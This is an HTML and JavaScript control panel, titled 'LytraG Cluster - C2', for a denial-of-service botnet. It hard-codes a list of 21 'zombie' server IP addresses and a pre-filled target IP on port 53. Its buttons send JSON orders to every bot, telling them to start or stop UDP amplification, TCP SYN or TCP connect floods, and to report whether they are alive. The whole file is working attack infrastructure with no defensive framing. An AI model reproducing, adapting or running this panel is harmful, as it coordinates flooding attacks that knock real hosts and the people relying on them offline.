<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Bootstrap demo</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-T3c6CoIi6uLrA9TneNEoa7RxnatzjcDSCmG1MXxSR1GAsXEV/Dwwykc2MPK8M2HN" crossorigin="anonymous">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.7.1/jquery.min.js"></script>

    <style>
        .container{
            margin-top: 10em;
            background-color: #281740;
            padding: 3em;
            border-radius: 15px;
            border: 1px solid #e6d9ff;
        }
        .container h2, label{
            color: #e6d9ff;
        }
        .btnRow{
            display: flex;
        }
        .actionBtn{
            margin-right: 1em;
        }
        .mRow{
            margin-top: 1em;
            margin-bottom: 1em;
        }
        .console{
            height: 15em;
            background-color: #100a1a;
            color: #ffffff;
            border: none;
        }
        .console:focus{
            height: 15em;
            background-color: #100a1a;
            color: #ffffff;
        }

        body{
            background-color: #110a1a;
        }
        input{
            background-color: #100a1a !important;
            color: #e4dafe !important;
            border: none !important;
        }
        select{
            background-color: #100a1a !important;
            color: #e4dafe !important;
            border: none !important;
        }
        .maoPrimary{
            background-color: #0f0a1a;
            border: none;
        }
        .maoSuccess{
            background-color: #6b6183;
            border: none;
        }
    </style>
    </head>
  <body>
    
    <div class="container">
        <div class="mRow">
            <h2>LytraG Cluster - C2</h2>
        </div>
        <div class="mRow">
            <input type="text" class="form-control" id="targetIP" placeholder="IP" value="116.12.155.107">
        </div>
        <div class="mRow">
            <label>Port:</label>
            <input type="text" class="form-control" id="targetPort" placeholder="Port" value="53">
        </div>
        <div class="mRow">
            <label>Method:</label>
            <select class="form-control" id="targetMethod">
                <option value="udp-amp" selected>UDP-AMP</option>
                <option value="tcp-syn">TCP-SYN</option>
                <option value="tcp-amp">TCP-AMP</option>
                <option value="tcp-connect">TCP-CONNECT</option>
            </select>
        </div>
        <div class="mRow">
            <label>Multiprocessing Forks:</label>
            <input type="text" class="form-control" id="targetProcesses" placeholder="Port" value="1">
        </div>
        <div class="mRow">
            <label>UDP Packet Size:</label>
            <input type="text" class="form-control" id="udpPacketSize" placeholder="128" value="128">
        </div>
        <div class="mRow btnRow">
            <button class="btn btn-primary maoPrimary actionBtn" onclick="startAll()">Start All</button>
            <button class="btn btn-primary maoPrimary actionBtn" onclick="stopAll()">Stop All</button>
            <button class="btn btn-success maoSuccess actionBtn" onclick="sanityAll()">Sanity Check</button>
        </div>
        <div class="mRow">
            <p id="overviewText" style="color:#ffffff;"></p>
            <textarea class="console form-control" id="console" readonly></textarea>
        </div>
    </div>
    
    <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.11.8/dist/umd/popper.min.js" integrity="sha384-I7E8VVD/ismYTF4hNIPjVp/Zjvgyol6VFvRkX/vR+Vc4jQkC+hVqc2pM8ODewa9r" crossorigin="anonymous"></script>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/js/bootstrap.min.js" integrity="sha384-BBtl+eGJRgqQAUMxJ7pMwbEyER4l1g+O15P+16Ep7Q9Q+zqX6gSbd85u4mG4QzX+" crossorigin="anonymous"></script>
    <script>


        var zombieList = [
        "34.142.233.169", "35.241.81.70", "34.150.105.119", "34.81.207.52", "35.229.230.229", "34.124.138.180", "34.87.62.156", 
        "34.126.96.94", "34.87.138.158", "34.87.133.85", "35.243.122.244", "35.221.87.122", "34.101.148.195", "34.101.169.113", 
        "34.143.161.245", "34.87.173.100", "35.247.167.233", "34.101.251.242", "34.128.104.141", "35.244.67.128", "34.151.109.222"


        ];
        
        document.getElementById('overviewText').innerText = `${zombieList.length} Servers | ~${55 * zombieList.length}mBit/s`;

        var sanityList = {
            
        }
        for (let i = 0; i < zombieList.length; i++) {
            sanityList[zombieList[i]] = "Unchecked";
        }
        
        function displayConsole(){
            var k = Object.keys(sanityList)
            var outp = "";
            for (let i = 0; i < k.length; i++) {
                outp += `${k[i]} - ${sanityList[k[i]]}\n`;
            }
            document.getElementById('console').innerHTML = outp;
        }

        function startAll(){
            var target = document.getElementById('targetIP').value;
            var targetPort = document.getElementById('targetPort').value;
            var targetMethod = document.getElementById('targetMethod').value;
            var targetProcesses = document.getElementById('targetProcesses').value;
            var udpPacketSize = document.getElementById('udpPacketSize').value;

            var x = new Date();
            var time = x.toTimeString().substr(0,8);

            for (let i = 0; i < zombieList.length; i++) {
                $.ajax({
                    url: `http://${zombieList[i]}/reim`, 
                    type: "POST",
                    contentType: "application/json; charset=utf-8",
                    data: JSON.stringify({
                        "id" : i,
                        "trg" : target,
                        "port" : targetPort,
                        "method" : targetMethod,
                        "processes" : targetProcesses,
                        "udpPacketSize" : udpPacketSize
                    }),
                    timeout: 5000,
                    success: function (data) {
                        var x = new Date();
                        sanityList[zombieList[i]] = `Booting ${target} ${time}`;
                    },
                    error: function(err){
                        sanityList[zombieList[i]] = "Down";
                    },
                });
            }
        }

        function stopAll(){
            for (let i = 0; i < zombieList.length; i++) {
                $.ajax({
                    url: `http://${zombieList[i]}/hyud`, 
                    type: "POST",
                    contentType: "application/json; charset=utf-8",
                    data: JSON.stringify({
                        "id" : i
                    }),
                    timeout: 5000,
                    success: function (data) {
                        sanityList[zombieList[i]] = `Idle`;
                    },
                    error: function(err){
                        sanityList[zombieList[i]] = "Down";
                    },
                });
            }
        }

        function sanityAll(){

            for (let i = 0; i < zombieList.length; i++) {
                $.ajax({
                    url: `http://${zombieList[i]}/sanityCheck`, 
                    type: "POST",
                    data: JSON.stringify({ 
                    }),
                    timeout: 2000,
                    success: function (data) {
                        sanityList[zombieList[i]] = "Idle";
                    },
                    error: function(err){
                        sanityList[zombieList[i]] = "Down";
                    },
                });
            }

        }

        setInterval(displayConsole, 1000);
    </script>
</body>
</html>